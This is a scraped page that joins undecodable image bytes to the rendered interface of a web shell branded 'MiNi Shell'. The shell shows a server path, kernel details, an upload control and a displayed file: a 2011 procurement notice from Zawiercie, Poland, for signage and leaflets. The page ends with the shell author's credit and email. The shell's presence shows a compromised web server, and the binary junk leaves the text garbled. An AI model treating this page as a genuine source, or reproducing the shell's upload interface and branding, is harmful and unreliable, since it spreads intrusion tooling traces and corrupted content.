JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110509/132337-N-2011.html

<p class="kh_header"><b>Zawiercie: Wykonanie, montaż oznakowania i wyposażenie punktów obsługowych i bezobsługowych w projekcie Zintegrowany System Informacji Kulturalnej realizowanym w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego Priorytet IV - Kultura, działanie 4.2. System Informacji Kulturalnej.</b><br>
<b>Numer ogłoszenia: 132337 - 2011; data zamieszczenia: 09.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie, montaż oznakowania i wyposażenie punktów obsługowych i bezobsługowych w projekcie Zintegrowany System Informacji Kulturalnej realizowanym w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego Priorytet IV - Kultura, działanie 4.2. System Informacji Kulturalnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie, montaż oznakowania i wyposażenie punktów obsługowych i bezobsługowych w projekcie Zintegrowany System Informacji Kulturalnej realizowanym w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego Priorytet IV - Kultura, działanie 4.2. System Informacji Kulturalnej.

Zakres:
1.	Przedmiotem zamówienia jest usługa wykonania i montażu oznakowania 3 punktów obsługowych i 11 punktów bezobsługowych, opracowanie graficzne i wykonanie ulotki i afisza oraz dostawa 3 tablic w projekcie Zintegrowany System Informacji Kulturalnej realizowanym w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego Priorytet IV - Kultura, działanie 4.2. System Informacji Kulturalnej, zgodnie z dokumentacją techniczną stanowiąca załączniki do niniejszej specyfikacji istotnych warunków zamówienia (SIWZ).  
2.	Przekazy na wszystkich nośnikach promocyjnych muszą uwzględniać odpowiednie wymagania z zakresu informacji i promocji (w tym wizualizacji), tj. źródła finansowania. Ponadto powinny obowiązkowo zawierać znaki graficzne: logo Narodowej Strategii Spójności z odwołaniem słownym do Programu Regionalnego, logo województwa śląskiego, flaga UE z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego oraz zapis: Kampania finansowana przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013. 
3.	Wykonawca zobowiązany będzie do stworzenia dwóch projektów ulotki i afiszu, 
a następnie przedstawienia ich w formie papierowej do akceptacji przez Zamawiającego. 
4.	Dostawa towaru do siedziby Wydziału Rozwoju i Promocji Miasta Zawiercia nastąpi na koszt i ryzyko Wykonawcy.
5.	Szczegółowy zakres zadania obejmuje: 
1)	Opracowanie graficzne i wykonanie ulotki Co Jest Grane 
- format: A3, składana do A4,
- nakład: 2x10000 sztuk,
- rodzaj i gramatura papieru: papier gazetowy klasa II,
- kolorystyka: (4+4) pełny kolor,
- inne: ulotka wykonana w języku polskim,
2)	Opracowanie graficzne i wykonanie szablonu afiszu Co Jest Grane
- format: A3,
- nakład: 200 sztuk,
- rodzaj i gramatura papieru: papier 120 g/m2,
- kolorystyka: (4+0) pełny kolor.
3)	Dostawa 3 tablic korkowych o wymiarach szerokość 120 cm, wysokość 90 cm.
4)	Wykonanie 3 sztuk oznakowania punktu obsługowego zgodnie z dokumentacją techniczną stanowiąca załączniki do specyfikacji istotnych warunków zamówienia (SIWZ). 
5)	Wykonanie 11 sztuk oznakowania punktu bezobsługowego zgodnie z dokumentacją techniczną stanowiąca załączniki do niniejszej specyfikacji istotnych warunków zamówienia (SIWZ).
6)	Wykonanie 5 sztuk gablot informacyjnych zgodnie z dokumentacją techniczną stanowiąca załączniki do niniejszej specyfikacji istotnych warunków zamówienia (SIWZ).
7)	Montaż 3 sztuk oznakowania punktu obsługowego w obiektach:
a.	Biuro Podróży AS, (holl dworca PKP), ul. 3 maja 1, Zawiercie wewnątrz w miejscu wskazanym przez Zamawiającego.
b.	Centrum Informacji Miejskiej, ul. Piastowska 1, Zawiercie na elewacji zewnętrznej w miejscu wskazanym przez Zamawiającego.
c.	Pałacyk nad Wartą w Kromołowie - Filia MOK Centrum, ul. Filaretów 1, Zawiercie - Kromołów na elewacji zewnętrznej w miejscu wskazanym przez Zamawiającego.
8)	Dostawa 11 sztuk oznakowania punktu bezobsługowego do obiektów:
a.	MOK Centrum (holl w kinie), ul. Piastowska 1, Zawiercie
b.	Miejska i Powiatowa Biblioteka Publiczna ((holl na parterze), ul. Szymańskiego 2, Zawiercie
c.	OSiR II Hala sportowa (holl na parterze), ul. Blanowska 40, Zawiercie
d.	Urząd Miejski w Zawierciu (holl na parterze), ul. Leśna 2
e.	Hotel Zawiercie**** (przy recepcji), ul. Wierzbowa 6, Zawiercie
f.	Hotel Villa Verde (przy recepcji), ul. Mrzygłodzka 273, Zawiercie
g.	Ośrodek Rekreacyjny MORSKO (przy recepcji), Zawiercie Morsko-Łężec
h.	Hotel***Fajkier (przy recepcji),  Lgota Murowana 37a, Kroczyce
i.	Hotel Ostaniec (przy recepcji), Podlesice 82, Kroczyce
j.	Hotel OSiR (przy głównym wejściu), Zawiercie, ul. Moniuszki
k.	InterMarche - pasaż, Zawiercie, ul. Obrońców Poczty Gdańskiej
9)	Montaż 5 sztuk gablot informacyjnych zlokalizowanych:
a.	Przystanek komunikacji miejskiej przy ul. Piłsudskiego.
b.	Przystanek komunikacji miejskiej przy ul. Sikorskiego.
c.	Przystanek komunikacji miejskiej na osiedlu Kromołów.
d.	Przystanek komunikacji miejskiej na osiedlu Bzów.
e.	Przystanek komunikacji miejskiej w sołectwie Skarżyce.
6.	Dokładne miejsce montażu oznakowania i gablot wskaże Zamawiający, po podpisaniu umowy.
7.	Szczegóły dotyczące konstrukcji elementów oznakowania, użytych materiałów, kolorystyki, grafiki, wymiarów, sposobu montażu określają załączniki do SIWZ będące dokumentacją techniczną: załącznik 1 Konstrukcja ramy, załącznik 2 Konstrukcja osłon, załącznik 2.1 Konstrukcja osłon, załącznik 3 Grafika, załącznik 4 Szyld info - punkt obsługowy - konstrukcja i mocowanie, załącznik 5 Szyld info - punkt obsługowy - grafika, załącznik 6 Gablota - konstrukcja ramy, załącznik 7 Konstrukcja osłon, załącznik 7.1 Konstrukcja gabloty, załącznik 8 - Mocowanie do gruntu, załącznik 9 - Grafika, załącznik 10 01.02 Kolorystyka, załącznik 11 01.03 Font, załącznik Specyfikacja techniczna wykonania i montażu oznakowania punktów w ramach Zintegrowanego Systemu Informacji Kulturalnej. 
8.	Wykonawca zobowiązany jest udzielić gwarancji na trwałość przedmiotu zamówienia na okres 24 miesięcy, licząc od dnia wykonania przedmiotu zamówienia.
9.	Wykonawca zapewni, w ramach udzielonej gwarancji, usunięcie wad przedmiotu zamówienia w czasie nie dłuższym jak 48 godzin od momentu zgłoszenia przez Zamawiającego usterki..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 31.52.32.00-0, 79.82.25.00-7, 79.81.00.00-5, 39.29.41.00-0, 22.14.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunku szczegółowego. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 12 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunku szczegółowego. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 12 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunku szczegółowego. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 12 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunku szczegółowego. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 12 do specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia w tym zakresie warunku szczegółowego. Wykonawca składa oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 12 do specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą:
1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 14 do specyfikacji.
2)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom,złożony na druku stanowiącym załącznik nr 15 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym
wpływ na realizację przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych, pokój nr 202..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2011 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Punkt Informacyjny (parter UM)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 09.05.2011 r.
Projekt Zintegrowany System Informacji Kulturalnej realizowany jest współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Priorytet IV - Kultura, działanie 4.2. System Informacji Kulturalnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com